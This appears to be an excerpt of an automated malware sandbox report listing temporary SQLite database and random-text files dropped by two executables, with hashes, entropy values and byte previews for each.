                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1959.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1979.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp19B9.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp28C2.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp28D3.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp28E3.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp28F4.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp38B3.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.695685570184741
                      Encrypted:false
                      SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                      MD5:A28F7445BB3D064C83EB9DBC98091F76
                      SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                      SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                      SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                      Malicious:false
                      Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                      C:\Users\user\AppData\Local\Temp\tmp38B4.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.701757898321461
                      Encrypted:false
                      SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                      MD5:520219000D5681B63804A2D138617B27
                      SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                      SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                      SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                      Malicious:false
                      Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                      C:\Users\user\AppData\Local\Temp\tmp38B5.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.695685570184741
                      Encrypted:false
                      SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                      MD5:A28F7445BB3D064C83EB9DBC98091F76
                      SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                      SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                      SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                      Malicious:false
                      Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                      C:\Users\user\AppData\Local\Temp\tmp38B6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.701757898321461
                      Encrypted:false
                      SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                      MD5:520219000D5681B63804A2D138617B27
                      SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                      SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                      SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                      Malicious:false
                      Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                      C:\Users\user\AppData\Local\Temp\tmp3C64.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp3C74.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp3C85.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp3CB5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4D1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4E2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4F2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp4F3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

